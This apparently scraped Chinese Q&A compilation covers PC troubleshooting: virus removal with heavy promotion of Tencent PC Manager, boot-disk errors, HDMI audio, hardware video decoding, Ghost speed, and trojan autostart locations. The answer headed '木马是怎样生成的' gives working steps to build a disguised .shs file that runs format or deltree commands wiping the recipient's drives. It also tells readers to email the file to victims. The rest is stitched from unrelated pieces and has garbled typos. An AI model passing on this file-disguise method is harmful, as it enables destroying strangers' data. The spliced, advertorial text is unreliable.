我发现我电脑中了相当不得了的病毒。
您好:
您的情况应该是中了很严重的病毒,导致了urll劫持。这时候,像360这样的杀毒软件也没什么用了,您需要一个强大给力的杀软。比如在AV-C真实世界保护测试中荣获第一的腾讯电脑管家,就很不错。
下载腾讯电脑管家,打开全部引擎,全盘查杀一下,一般情况下都可以清除病毒。
如果杀毒后还是异常,您可以在电脑管家——工具箱中找到顽固木马克星,用它来强力查杀一下,重启,即可彻底杀灭病毒,不重复感染。
为什么打开某个文件会中电脑病毒?
很明显是资源不安全,你平时可以开启防火墙打开腾讯电脑管家——杀毒——实时防护——文件下载保护其次,建议你查杀看看腾讯电脑管家是免费专业安全软件,杀毒管理二合一(只需要下载一份),占内存小,杀毒好,防护好,无误报误杀。拥有云查杀引擎、反病毒引擎、金山云查杀引擎、AVIRA查杀引擎、小红伞和查杀修复引擎等世界一流杀毒软件内嵌杀毒引擎!保证杀毒质量安装运行腾讯电脑管家后可以很醒目的看到杀毒选项你可以根据需要选择闪电查杀、全盘查杀、和自定义位置查杀三种模式进行查杀
电脑显示Primary master hard disk fail怎么办
Primary master hard disk fail怎么办 Q:我的电脑(内含120GB希捷硬盘)最近出现了问题:开机时总是显示“Primary master hard disk fail”,并提示按F1键,但按下F1键后屏幕上又出现“Disk Boot Fail……”的错误信息,始终无法进入Windows系统。请问这是什么原因?电脑知识网推荐 A:这种情况一般有两种原因引起:一是硬盘主引导记录被破坏;二是硬盘引导分区的引导扇区被破坏。具体解决办法如下:首先把故障硬盘的跳线设置为从盘,并挂接到其他电脑中,看看能否正常读写,如果能正常读写说明分区表本身还是好的,可以用带参数的FDISK命令修复(常见参数为/MBR、/PRI和/EXT,它们分别表示重写主引导记录、重写DOS基本分区引导记录和重写DOS扩展分区引导记录)。另外,如果分区表损坏,可以用Norton磁盘修复工具进行恢复,或者用FDISK重新分区。 双核变单核的原因 朋友新配了一台Core2 Duo E7400的双核电脑,让装机员装好Windows XP后直接抱回了家,结果不经意间打开任务管理器,发现CPU使用记录只显示了一个核心,顿时慌了,以为买到了假货。笔者过来检查,发现在设备管理器里的确有两个核心,为什么任务管理器里就一个核心?再仔细一看,原来任务管理器CPU使用记录被设置为了“所有CPU一张图表”,真是让人哭笑不得,估计是装机员偷懒用Ghost给他装的盗版Windows XP,才出现这样的错误。在任务管理器里的“查看”选项卡的“CPU记录”里手动把“所有CPU一张图表”改为“每个CPU一张图表”,问题就解决了。 开机几秒自动断电 这是朋友的一台老电脑,配置是Athlon64 X2 3600+和C61G主板,用了有几年了,最近突然开不了机,现象为按下机箱电源键,系统通电启动后不到10秒就自动关机了。笔者帮着开箱检查了硬件,还把整个平台都从机箱里拿出来单独开机,却又一切正常。百思不得其解的时候,顺手按了几下机箱的电源键,发现有些粘滞,按下去要过一会儿才能弹起来……原来问题在这里,由于机箱开关按下去接触的时间太长,而主板的Power on信号导通超过5秒就会强制关机——真让人无语,谁会想到是这个破机箱电源键的问题呢?换机箱了事。 hdmi没有声音怎么办 笔者最近买了一台32英寸的液晶电视,放在卧室与电脑用HDMI线连接看电影,而电脑上面还用VGA线连接了一台19英寸的LCD显示器,两个显示设备采用了双屏扩展显示的方式。最近发现电视在放电影的时候不出声,经过一番研究,找到其中缘由,特与大家分享。 故障分析 我使用的操作系统是Windows XP,显卡是Radeon HD4650,用HDMI线与液晶电视相连,音频信号自然是来自Radeon HD4650内置的音频单元,而在出故障的时候,很显然是音频信号没有从HDMI接口传输到电视上去。这时打开音频控制面板,发现音频设备显示的是主板集成的Realtek HD声卡——主板的声卡根本没和任何音响设备连接,怎么可能出声?按照以往的印象,正常使用时音频设备这里应该还要显示一个ATI HD Audio设备的,但出故障的时候它却不见了。无奈只好重装显卡驱动,安装完之后它又出现在了音频设备中。 故障解决 看来是驱动文件丢失的问题导致ATI HD Audio设备消失,重装驱动后,在音频控制面板中将它设置为默认设备,并勾选“只适用默认设备”(因为只需要用这台电脑在电视上看电影,平时用来办公时不需要发声),重启电脑后一切正常了。 如何提升H55的高清性能 今年Intel发布的Core i3处理器与H55的组合成为很多HTPC玩家关注的热点,到底它的高清能力怎么样,要如何去发挥它的硬件解码功能,相信也是很多玩家关注的,笔者在这里就把自己玩H55平台高清解码的一些心得与大家分享一下。 Clarkdale图形核心的视频功能 对比Intel上一代的整合GMA X4500 HD图形核心,Clarkdale进一步增强了HDTV硬件解码能力,其具备的Intel Clear Video HD技术能够真正硬件解码MPEG2、VC-1和AVC(H.264)等不同编码格式的1080P高清视频,可支持码率高达40Mb/s的Blu-Ray Full Framerate影像播放。并且增加了Dual Stream解码技术,能够同时对两部1080P HDTV进行双流解码。在音频方面更是增加了对Dolby TrueHD及DTS-HD MasterAudio等无损音频源码输出的支持。所以用它来搭建HTPC也是很不错的选择,不过要发挥出它全部的硬解码能力,还需要进行一番设置才行,请看后面的详细介绍。 实战H55平台高清硬解码 测试平台: CPU:Core i3 530 (2.93GHz,GPU:733MHz) 主板:微星 H55-E33 内存:金士顿 DDR3 1333 2GB×1 (共享128MB显存) 电源:航嘉磐石400 软件环境:Windows7 旗舰版 Intel系列芯片组显示驱动15.17.1.2086版For Vista-32/Win7-32 CyberLink PowerDVD 9 暴风影音、射手影音、完美解码、终极解码 虽然Clarkdale图形核心能够支持MPEG2、VC-1、AVC(H.264)等1080P高清视频的硬件解码,但由于刚上市不久,目前的.很多播放软件对其支持仍不够完善。下面随笔者一起来研究一下如何正确开启Clarkdale图形核心的硬件解码功能。测试平台中选用了目前主流的Core i3 530 + H55主板的搭配,并且使用NVIDIA和AMD的主流显卡进行硬件解码能力的对比测试。 由于Intel在Windows XP操作系统下的显示驱动中并未加入对高清视频硬件解码功能的支持,因此如果要开启Clarkdale图形核心的硬解功能,必须要选用Vista或者Windows7操作系统。接下来介绍几个常用播放软件的硬解码开启方法。 CyberLink PowerDVD 9 作为最早支持显卡硬件解码的老牌播放软件之一的PowerDVD,在对Clarkdale图形核心的兼容上非常的完美,我们只需在右键“配置”菜单中调出视频设置菜单,勾选“启用硬件加速(Intel ClearVideo)”就能够打开硬件功能(图1)。在播放过程中点击“信息”选项卡,能够看到 “视频加速器:DirectX VA”显示为“使用中”,说明已经正确开启了显卡对高清视频的硬解码功能(图2)。 暴风影音、射手影音 在暴风影音播放器中开启硬件解码的方法也非常简单。打开高清视频后,在播放界面的左下方点击“开启高清视频方案”,选择菜单中的“Intel 解决方案(Vista_Win7)( 默认)”,就能够顺利开启硬件解码(图3)。 射手影音虽然是一个名不见经传的播放软件,但对Clarkdale图形核心硬件解码的支持也比较好,在播放影片过程中,进入右键菜单的“画面”选项中,勾选“启用硬件加速”即可,非常方便(图4)。 完美解码、终极解码 完美解码与终极解码都是在高清玩家中使用率非常高的播放软件,但很可惜这两款播放器都没有提供预先设置好的针对Intel集成显卡的高清硬件方案。不过不用担心,我们完全可以手动进行添加设置。首先把两款播放软件中首选的播放器均设置为KMplayer,接着打开KMplayer播放器,进入右键菜单中的“选项→参数设置”子栏目,打开“滤镜控制→解码器使用→外部视频解码器”菜单,点击“搜索外部解码器” →“在扫描后添加”,软件就会自动搜索系统中已经安装的所有可用的视频解码器,并在菜单中列出来。 接着我们打开暴风影音,点击“高级选项”的“高清”子菜单,进入右方对话框的“详细设置”选项中,就可以看到“Intel 解决方案(Vista_Win7)( 默认)”中各种分离器、解码器的详细配置情况(图5)。记录下这些详细设置,然后进入KMplayer播放器的“滤镜控制→分离器”、“解码器使用”设置菜单中(图6),把各个针对MPEG2、VC-1、AVC(H.264)不同编码的分离器、解码器均按照暴风影音的上述方案进行修改设置,然后保存退出。 接下来是最重要的一步,进入完美解码的解码设置中心,把“视频渲染器”改为“EVR 增强型渲染C/A”(图7),或者进入终极解码的设置中心,把“视频输出”设置为“增强型渲染—EVR”(图8)。经过上述设置之后,用完美解码或者终极解码软件进行高清播放时就能够顺利开启显卡的硬解码功能。 从上面的测试中可以看到,Clarkdale图形核心的高清硬件解码能力非常突出,整体表现不输于NVIDIA和AMD的主流独立显卡,不过在XP下无法使用硬件解码功能确实是一个不小的遗憾。Clarkdale图形核心的出现,让Intel有了与两大显卡巨头争夺HTPC显卡市场份额的实力。Clarkdale图形核心不仅支持高清视频硬件解码,还提供了对无损音频的解码功能,在以后的文章中将会继续为大家介绍如何使用H55平台进行Dolby TrueHD及DTS-HD MasterAudio等无损音频源码的输出。 博士点评>> Core i3和H55的发热量和功耗都很低,无论是软解码还是硬解码能力都比较不错,用来做HTPC平台是很好的选择,而高清硬解码的播放软件设置一直是个难点,对于很多玩家来说,在这些需要手动设置解码器、分离器、渲染模式的播放软件面前都只能望而却步。本期我们的DIY明星林以诺和大家分享了他在玩H55平台硬解码方面的经验和技巧,相信也解决了不少朋友的难题。如果你也有什么DIY的经验技巧,也不妨拿出来和大家分享,DIY研究所就是展现你能力的舞台。 ghost速度太慢怎么办 笔者的朋友买了一台配备了四核2.40GHz处理器、2GB内存的电脑,但在使用过程中却发现使用Ghost备份/还原系统的速度很慢,每分钟只有160MB~180MB,这明显是不正常的。 影响Ghost速度的原因 我们知道,影响备份/还原速度通常有以下几个原因: 1.备份时选择不同的压缩比,会有不同的备份还原速度。 在用Ghost做镜像文件的时候有三个选项:fast、normal、high,分别指的是三种压缩比模式。选择fast则是较低的压缩比,做出来的镜像文件比较大,但是速度非常快;选择high则是较高的压缩比,做出来的镜像文件较小,可以省下不少空间,但是进行的速度却非常慢。那么在还原的时候,也就是在解压缩的时候也是这样的情况。 2.主板BIOS中有关磁盘工作方式的设置。 磁盘的工作方式也会对备份/还原系统的速度造成很大的影响。 解决方法 针对以上几点,可采取以下办法: 1.现在的硬盘容量都比较大,如果硬盘空间不是特别紧张的话,建议选择低压缩(fast模式),这样备份还原的速度就快。这里笔者就选择了fast模式。 2.在主板BIOS中优化设置。启动时,按DEL键(或F2键,BIOS不同则按键有所不同)进入BIOS设置,选择Integrated peripherals(管理主板集成设备和端口的选项),再选择Onchip IDE Device(IDE设备,主要包括硬盘和光驱设备),接下来可以看到:IDE HDD Block Mode(IDE硬盘块模式),设定值有: Disabled (禁用)和Enabled(开启)。 这里笔者选择了Enabled,可以允许硬盘用快速块模式(Fast Block Mode)来传输数据。打开之后,就能加快备份/还原的速度。 经过以上调节,朋友的电脑用Ghost备份/还原的速度终于突破1GB/min了,这是一个比较正常的速度。
电脑开不了机,显示primary master hard disk error。需详细解决方案
1/6判断系统是否能识别硬盘,如果系统BIOS不能识别硬盘,则应打开机箱检查软/硬盘驱动器的电源、数据电缆是否正常,连接是否可靠,驱动器安装是否正确,驱动器本身质量是否有问题。2/6若系统BIOS能识别硬盘,则需分析主引导记录、系统分区表和逻辑C盘信息是否正确。以A驱启动后系统不能识别C盘,表明 硬盘的主引导记录、分区信息已遭破坏,应使用FDISK重新建立分区信息,然后用FORMAT C:命令对C盘进行高级格式化。3/6若从A驱启动后系统能识别和进入C盘但不能从C盘启动,表明分区表和逻辑C盘信息正确,此时应判断C盘分区是否被激活,可运行FKISK查看并将C盘设为活动分区。4/6若分区表信息正确且C盘已是活动分区但仍不能C盘启动,表明C盘引导记录已遭到破坏,应重建C盘引导系统,可从A驱启动,并执行SYS C:命令将系统传到C盘上。5/6经上述步骤,C盘应能启动成功。若还不能,则应检查病毒。6/6在重装引导系统的过程中如发现不能烈军属入分区表信息或引导区记录,应BIOS设置中是否打开了病毒防护功能而阻止了程序向主引导分区的写操作【摘要】
电脑开不了机,显示primary master hard disk error。需详细解决方案【提问】
1/6判断系统是否能识别硬盘,如果系统BIOS不能识别硬盘,则应打开机箱检查软/硬盘驱动器的电源、数据电缆是否正常,连接是否可靠,驱动器安装是否正确,驱动器本身质量是否有问题。2/6若系统BIOS能识别硬盘,则需分析主引导记录、系统分区表和逻辑C盘信息是否正确。以A驱启动后系统不能识别C盘,表明 硬盘的主引导记录、分区信息已遭破坏,应使用FDISK重新建立分区信息,然后用FORMAT C:命令对C盘进行高级格式化。3/6若从A驱启动后系统能识别和进入C盘但不能从C盘启动,表明分区表和逻辑C盘信息正确,此时应判断C盘分区是否被激活,可运行FKISK查看并将C盘设为活动分区。4/6若分区表信息正确且C盘已是活动分区但仍不能C盘启动,表明C盘引导记录已遭到破坏,应重建C盘引导系统,可从A驱启动,并执行SYS C:命令将系统传到C盘上。5/6经上述步骤,C盘应能启动成功。若还不能,则应检查病毒。6/6在重装引导系统的过程中如发现不能烈军属入分区表信息或引导区记录,应BIOS设置中是否打开了病毒防护功能而阻止了程序向主引导分区的写操作【回答】
我还是有些不太明白,回答能否再详细些?【提问】
系统有效驱动器无均不能启动1/6检查系统BIOS设置中是否正确设置了软/硬盘驱动器的各项参数,参数设置不正常会导致微机不能正确识别各个驱动器,则系统启动也无从说起。2/6若系统能正确识别各个驱动器,除硬盘外的驱动器都能启动系统,则可参照本文第3节的方法对硬盘进行处理。3/6若仍不能从A驱或CDROM上启动,应该检查A驱或CDROM的安装、连线是否正常。4/6若A驱或CDROM安装正常仍不能启动,应该检查启动软盘或启动光盘是否安装了完整的引导系统,该步骤只能在其它确认正常的计算机上进行检查。5/6若系统引导盘也无问题,则应检查软驱磁头或CDROM的光头是否太脏,可用清洗剂或无水酒精进行清洗。6/6仍不能引导的,可能是驱动器本身有故障。 那么只有送修了。【回答】
如何卸载小红伞?
1、可以通过控制面板进行卸载, 同时按WIN+R键,打开“运行”对话框,输入control,按回车键,打开“控制面板”,点击“卸载程序”,找到小红伞,右键选择“卸载”即可。 2、卸载完成后,通过360、qq管家等软件清理一下拉圾,以便删除小红伞生成的临时文件、配置文件等等。以qq管家为例,点击底部的”清理拉圾“,在”清理拉圾“界面点击”扫描拉圾“,完成扫描,删除即可。
小红伞卸载不了怎么办
完全卸载小红伞
卸载方法有几种,下面是抛砖:
1、使用小红伞自带的卸载程序
找到小红伞安装文件夹,比如:
C:\Program Files\Avira\AntiVir Desktop,点击setup,进入修改、卸载页面,点击remov。
2、使用小红伞安装程序卸载
双击小红伞安装程序,出现修改、修复、卸载页面,点击remove。
3、使用控制面板/添加或删除程序
4、使用360安全卫士
如果,使用第三方卸载工具没有完全卸载,最好的办法是把小红伞在原安装文件夹重新安装一遍,再用上述第一种方法卸载。可以完全卸载。
尽量不用第三方卸载工具。
木马的制作
概念:特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。
从木马的发展来看,基本上可以分为两个阶段。
最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。
而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。
所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。
原理:“木马”程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False,程序运行时就不会出现在任务栏中了。在任务管理器中隐形:将程序设为“系统服务”可以很轻松地伪装自己。
当然它也会悄无声息地启动,你当然不会指望用户每次启动后点击“木马”图标来运行服务端,,“木马”会在每次用户启动时自动装载服务端,Windows系统启动时自动加载应用程序的方法,“木马”都会用上,如:启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。
在win.ini文件中,在[WINDOWS]下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。一般情况下,它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。当然你也得看清楚,因为好多“木马”,如“AOL Trojan木马”,它把自身伪装成command.exe文件,如果不注意可能不会发现它不是真正的系统启动文件。
在system.ini文件中,在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell= explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,就是说你已经中“木马”了。
在注册表中的情况最复杂,通过regedit命令打开注册表编辑器,在点击至:“HKEY-LOCAL-MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”目录下,查看键值中有没有自己不熟悉的自动启动文件,扩展名为EXE。
这里切记:有的“木马”程序生成的文件很像系统自身文件,想通过伪装蒙混过关,如“Acid Battery v1.0木马”,它将注册表“HKEY-LOCAL-MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run”下的Explorer 键值改为Explorer=“C:/WINDOWS/expiorer.exe”,“木马”程序与真正的Explorer之间只有“i”与“l”的差别。
当然在注册表中还有很多地方都可以隐藏“木马”程序,如:“HKEY-CURRENT-USER/Software/Microsoft/Windows/CurrentVersion/Run”、“HKEY-USERS/****/Software/Microsoft/Windows/CurrentVersion/Run”的目录下都有可能,最好的办法就是在“HKEY-LOCAL-MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”下找到“木马”程序的文件名,再在整个注册表中搜索即可。
知道了“木马”的工作原理,查杀“木马”就变得很容易,如果发现有“木马”存在,最安全也是最有效的方法就是马上将计算机与网络断开,防止黑客通过网络对你进行攻击。
然后编辑win.ini文件,将[WINDOWS]下面,“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”;编辑system.ini文件,将[BOOT]下面的“shell=‘木马’文件”,更改为:“shell=explorer.exe”;在注册表中,用regedit对注册表进行编辑,先在“HKEY-LOCAL-MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”下找到“木马”程序的文件名,再在整个注册表中搜索并替换掉“木马”程序。
有时候还需注意的是:有的“木马”程序并不是直接将“HKEY-LOCAL-MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”下的“木马”键值删除就行了,因为有的“木马”如:BladeRunner“木马”,如果你删除它,“木马”会立即自动加上,你需要的是记下“木马”的名字与目录,然后退回到MS-DOS下,找到此“木马”文件并删除掉。
重新启动计算机,然后再到注册表中将所有“木马”文件的键值删除。至此,我们就大功告成了。
木马一词的来源:
“木马”原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上,“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中,包含了可以控制用户的计算机系统的程序,可能造成用户的系统被破坏甚至瘫痪
木马是怎样生成的?
木马有两种意思:1.木头做的马。2.木马是一种盗号的病毒。如果你想深入了解请访问不良小网站。木马作用是给计算机添加口令,浏览、移动、复制、删除文件.....木马的生成啊!简单编程序啊1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。 2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板 文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后 点击“浏览”按钮选择要插入的文件。 3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹 出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令 :start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示 出命令内容。 4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一 个图标。 5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名 称)。点击“文件”菜单中的“更新”,然后关闭此对话框。 6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默 认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面 上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作 为附件发出。 7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文 所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对 象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符 根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当 然大家可以改成其它的命令) 很简单的
电脑中木马病毒怎么办
您好!电脑中木马病毒处理方法一,【进入安全模式】1,因为顽固木马很多都是蠕虫病毒的一种,寄宿在一些核心文件内,我们一般正常情况下杀毒软件也很难将其找出清理;2,最理想的办法就是进入安全模式杀毒,因为安全模式下,第三方驱动无法自动运行,病毒也只能等待被杀毒软件检测出来了;3,首先我们重启电脑,在重启电脑的过程中,不断按F8键,进入windows系统的菜单,WIN8除外,然后菜单选择;4,在菜单中,我们选择安全模式即可,如果电脑上没杀毒软件,可以选择进入网络安全模式也可以的;【摘要】
电脑中木马病毒怎么办【提问】
您好!电脑中木马病毒处理方法一,【进入安全模式】1,因为顽固木马很多都是蠕虫病毒的一种,寄宿在一些核心文件内,我们一般正常情况下杀毒软件也很难将其找出清理;2,最理想的办法就是进入安全模式杀毒,因为安全模式下,第三方驱动无法自动运行,病毒也只能等待被杀毒软件检测出来了;3,首先我们重启电脑,在重启电脑的过程中,不断按F8键,进入windows系统的菜单,WIN8除外,然后菜单选择;4,在菜单中,我们选择安全模式即可,如果电脑上没杀毒软件,可以选择进入网络安全模式也可以的;【回答】
二,查杀顽固木马1,接下来就是对电脑中的顽固木马查杀了,可以选择用腾讯电脑管家,然后打开其中的病毒查杀这个功能,对电脑病毒进行清理;2,杀毒完成后,正常重启电脑,你会发现病毒神奇的没有了,以后电脑使用的时候一定要保持杀毒软件处于开启状态,就可以避免电脑中毒情况发生。【注意事项】1,电脑木马病毒是需要经常查杀才可以的2,定期查杀电脑木马病毒,可以避免电脑被病毒危害。【回答】
为什么我的电脑总是中木马病毒?
一、 杀(防)毒软件不可少 病毒的发作给全球计算机系统造成巨大损失,令人们谈“毒”色变。上网的人中,很少有谁没被病毒侵害过。对于一般用户而言,首先要做的就是为电脑安装一套正版的杀毒软件。 现在不少人对防病毒有个误区,就是对待电脑病毒的关键是“杀”,其实对待电脑病毒应当是以“防”为主。目前绝大多数的杀毒软件都在扮演“事后诸葛亮”的角色,即电脑被病毒感染后杀毒软件才忙不迭地去发现、分析和治疗。这种被动防御的消极模式远不能彻底解决计算机安全问题。杀毒软件应立足于拒病毒于计算机门外。因此应当安装杀毒软件的实时监控程序,应该定期升级所安装的杀毒软件(如果安装的是网络版,在安装时可先将其设定为自动升级),给操作系统打相应补丁、升级引擎和病毒定义码。由于新病毒的出现层出不穷,现在各杀毒软件厂商的病毒库更新十分频繁,应当设置每天定时更新杀毒实时监控程序的病毒库,以保证其能够抵御最新出现的病毒的攻击。 每周要对电脑进行一次全面的杀毒、扫描工作,以便发现并清除隐藏在系统中的病毒。当用户不慎感染上病毒时,应该立即将杀毒软件升级到最新版本,然后对整个硬盘进行扫描操作,清除一切可以查杀的病毒。如果病毒无法清除,或者杀毒软件不能做到对病毒体进行清晰的辨认,那么应该将病毒提交给杀毒软件公司,杀毒软件公司一般会在短期内给予用户满意的答复。而面对网络攻击之时,我们的第一反应应该是拔掉网络连接端口,或按下杀毒软件上的断开网络连接钮。 二、个人防火墙不可替代 如果有条件,安装个人防火墙(Fire Wall)以抵御黑客的袭击。所谓“防火墙”,是指一种将内部网和公众访问网(Internet)分开的方法,实际上是一种隔离技术。防火墙是在两个网络通讯时执行的一种访问控制尺度,它能允许你“同意”的人和数据进入你的网络,同时将你“不同意”的人和数据拒之门外,最大限度地阻止网络中的黑客来访问你的网络,防止他们更改、拷贝、毁坏你的重要信息。防火墙安装和投入使用后,并非万事大吉。要想充分发挥它的安全防护作用,必须对它进行跟踪和维护,要与商家保持密切的联系,时刻注视商家的动态。因为商家一旦发现其产品存在安全漏洞,就会尽快发布补救(Patch) 产品,此时应尽快确认真伪(防止特洛伊木马等病毒),并对防火墙进行更新。在理想情况下,一个好的防火墙应该能把各种安全问题在发生之前解决。就现实情况看,这还是个遥远的梦想。目前各家杀毒软件的厂商都会提供个人版防火墙软件,防病毒软件中都含有个人防火墙,所以可用同一张光盘运行个人防火墙安装,重点提示防火墙在安装后一定要根据需求进行详细配置。合理设置防火墙后应能防范大部分的蠕虫入侵。 三、分类设置密码并使密码设置尽可能复杂 在不同的场合使用不同的密码。网上需要设置密码的地方很多,如网上银行、上网账户、E-Mail、聊天室以及一些网站的会员等。应尽可能使用不同的密码,以免因一个密码泄露导致所有资料外泄。对于重要的密码(如网上银行的密码)一定要单独设置,并且不要与其他密码相同。 设置密码时要尽量避免使用有意义的英文单词、姓名缩写以及生日、电话号码等容易泄露的字符作为密码,最好采用字符与数字混合的密码。 不要贪图方便在拨号连接的时候选择“保存密码”选项;如果您是使用Email客户端软件(Outlook Express、Foxmail、The bat等)来收发重要的电子邮箱,如ISP信箱中的电子邮件,在设置账户属性时尽量不要使用“记忆密码”的功能。因为虽然密码在机器中是以加密方式存储的,但是这样的加密往往并不保险,一些初级的黑客即可轻易地破译你的密码。 定期地修改自己的上网密码,至少一个月更改一次,这样可以确保即使原密码泄露,也能将损失减小到最少。 四、不下载来路不明的软件及程序,不打开来历不明的邮件及附件 不下载来路不明的软件及程序。几乎所有上网的人都在网上下载过共享软件(尤其是可执行文件),在给你带来方便和快乐的同时,也会悄悄地把一些你不欢迎的东西带到你的机器中,比如病毒。因此应选择信誉较好的下载网站下载软件,将下载的软件及程序集中放在非引导分区的某个目录,在使用前最好用杀毒软件查杀病毒。有条件的话,可以安装一个实时监控病毒的软件,随时监控网上传递的信息。 不要打开来历不明的电子邮件及其附件,以免遭受病毒邮件的侵害。在互联网上有许多种病毒流行,有些病毒就是通过电子邮件来传播的,这些病毒邮件通常都会以带有噱头的标题来吸引你打开其附件,如果您抵挡不住它的诱惑,而下载或运行了它的附件,就会受到感染,所以对于来历不明的邮件应当将其拒之门外。 五、警惕“网络钓鱼” 目前,网上一些黑客利用“网络钓鱼”手法进行诈骗,如建立假冒网站或发送含有欺诈信息的电子邮件,盗取网上银行、网上证券或其他电子商务用户的账户密码,从而窃取用户资金的违法犯罪活动不断增多。公安机关和银行、证券等有关部门提醒网上银行、网上证券和电子商务用户对此提高警惕,防止上当受骗。 目前“网络钓鱼”的主要手法有以下几种方式: (1)发送电子邮件,以虚假信息引诱用户中圈套。诈骗分子以垃圾邮件的形式大量发送欺诈性邮件,这些邮件多以中奖、顾问、对账等内容引诱用户在邮件中填入金融账号和密码,或是以各种紧迫的理由要求收件人登录某网页提交用户名、密码、身份证号、信用卡号等信息,继而盗窃用户资金。 (2)建立假冒网上银行、网上证券网站,骗取用户账号密码实施盗窃。犯罪分子建立起域名和网页内容都与真正网上银行系统、网上证券交易平台极为相似的网站,引诱用户输入账号密码等信息,进而通过真正的网上银行、网上证券系统或者伪造银行储蓄卡、证券交易卡盗窃资金;还有的利用跨站脚本,即利用合法网站服务器程序上的漏洞,在站点的某些网页中插入恶意Html代码,屏蔽住一些可以用来辨别网站真假的重要信息,利用cookies窃取用户信息。 (3)利用虚假的电子商务进行诈骗。此类犯罪活动往往是建立电子商务网站,或是在比较知名、大型的电子商务网站上发布虚假的商品销售信息,犯罪分子在收到受害人的购物汇款后就销声匿迹。 (4)利用木马和黑客技术等手段窃取用户信息后实施盗窃活动。木马制作者通过发送邮件或在网站中隐藏木马等方式大肆传播木马程序,当感染木马的用户进行网上交易时,木马程序即以键盘记录的方式获取用户账号和密码,并发送给指定邮箱,用户资金将受到严重威胁。 (5)利用用户弱口令等漏洞破解、猜测用户账号和密码。不法分子利用部分用户贪图方便设置弱口令的漏洞,对银行卡密码进行破解。 实际上,不法分子在实施网络诈骗的犯罪活动过程中,经常采取以上几种手法交织、配合进行,还有的通过手机短信、QQ、MSN进行各种各样的“网络钓鱼”不法活动。反网络钓鱼组织APWG(Anti-Phishing Working Group)最新统计指出,约有70.8%的网络欺诈是针对金融机构而来。从国内前几年的情况看大多Phishing只是被用来骗取QQ密码与游戏点卡与装备,但今年国内的众多银行已经多次被Phishing过了。可以下载一些工具来防范Phishing活动,如Netcraft Toolbar,该软件是IE上的Toolbar,当用户开启IE里的网址时,就会检查是否属于被拦截的危险或嫌疑网站,若属此范围就会停止连接到该网站并显示提示。 六、防范间谍软件 最近公布的一份家用电脑调查结果显示,大约80%的用户对间谍软件入侵他们的电脑毫无知晓。间谍软件(Spyware)是一种能够在用户不知情的情况下偷偷进行安装(安装后很难找到其踪影),并悄悄把截获的信息发送给第三者的软件。它的历史不长,可到目前为止,间谍软件数量已有几万种。间谍软件的一个共同特点是,能够附着在共享文件、可执行图像以及各种免费软件当中,并趁机潜入用户的系统,而用户对此毫不知情。间谍软件的主要用途是跟踪用户的上网习惯,有些间谍软件还可以记录用户的键盘操作,捕捉并传送屏幕图像。间谍程序总是与其他程序捆绑在一起,用户很难发现它们是什么时候被安装的。一旦间谍软件进入计算机系统,要想彻底清除它们就会十分困难,而且间谍软件往往成为不法分子手中的危险工具。 从一般用户能做到的方法来讲,要避免间谍软件的侵入,可以从下面三个途径入手: (1)把浏览器调到较高的安全等级——Internet Explorer预设为提供基本的安全防护,但您可以自行调整其等级设定。将Internet Explorer的安全等级调到“高”或“中”可有助于防止下载。 (2)在计算机上安装防止间谍软件的应用程序,时常监察及清除电脑的间谍软件,以阻止软件对外进行未经许可的通讯。 